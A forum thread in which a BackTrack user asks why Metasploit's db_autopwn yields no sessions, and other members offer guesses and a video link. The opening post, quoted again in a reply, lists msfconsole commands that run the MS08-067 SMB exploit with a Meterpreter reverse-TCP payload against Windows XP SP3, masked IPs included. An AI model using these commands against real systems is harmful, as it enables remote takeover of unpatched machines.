Results 1 to 5 of 5

Thread: db_autopwn doesn't work

  1. #1
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    2

    Default db_autopwn doesn't work

    Hi everybody! Sorry for my english. I'm from Russia and i didn't learn in school )))
    I have a problem with metasploit. Using BackTrack 4 R2. When I starting db_autopwn, it's show me, that db_autopwn has finished with no sessions. But, when I start it in "manual mode"
    Code:
    use /windows/smb/ms08_067_netapi
    set RHOST xxx.xxx.xxx.xxx
    set PAYLOAD /windows/meterpreter/reverce_tcp
    set LHOST xxx.xxx.xxx.xxx
    exploit
    it's open me meterpreter session. My Target is WinXP SP3
    What I'm doing wrong?

  2. #2
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: db_autopwn doesn't work


  3. #3
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    2

    Default Re: db_autopwn doesn't work

    Quote Originally Posted by Jimmy87 View Post
    Yes. I read this post, and I did exactly like there. No results.

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    69

    Default Re: db_autopwn doesn't work

    Quote Originally Posted by megahertz785421 View Post
    Hi everybody! Sorry for my english. I'm from Russia and i didn't learn in school )))
    I have a problem with metasploit. Using BackTrack 4 R2. When I starting db_autopwn, it's show me, that db_autopwn has finished with no sessions. But, when I start it in "manual mode"
    Code:
    use /windows/smb/ms08_067_netapi
    set RHOST xxx.xxx.xxx.xxx
    set PAYLOAD /windows/meterpreter/reverce_tcp
    set LHOST xxx.xxx.xxx.xxx
    exploit
    it's open me meterpreter session. My Target is WinXP SP3
    What I'm doing wrong?
    This may not be the answer but...
    When you run "exploit" in msfconsole, it automatically connects you to the shell. I believe ab_autopwn runs exploit -j which should list the shells you have. (assuming its working properly). It may also be that autopwn isn't properly recognizing the exploit and/or running the payload.
    Just an observation

  5. #5
    Member
    Join Date
    May 2010
    Location
    Frankfurt/Main
    Posts
    58

    Default AW: Re: db_autopwn doesn't work

    Quote Originally Posted by megahertz785421 View Post
    Yes. I read this post, and I did exactly like there. No results.
    exactly like: http://www.youtube.com/watch?v=dKLWvGWA-Ow ??

Similar Threads

  1. aireplay-ng doesn't work
    By SiteManager in forum Beginners Forum
    Replies: 5
    Last Post: 04-02-2011, 01:41 AM
  2. Intel Pro 3945abg doesn't work work after apt-get dist-upgrade
    By PalmerEldritch in forum BackTrack Bugs
    Replies: 2
    Last Post: 07-22-2010, 02:02 PM
  3. Boot from USB doesn't work
    By tschoppi in forum Beginners Forum
    Replies: 12
    Last Post: 02-26-2010, 09:44 PM
  4. Ark doesn't work from Konqueror
    By Virchanza in forum OLD BackTrack 4 Bugs and Fixes
    Replies: 5
    Last Post: 08-14-2009, 04:09 PM
  5. Replies: 0
    Last Post: 12-13-2008, 03:36 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •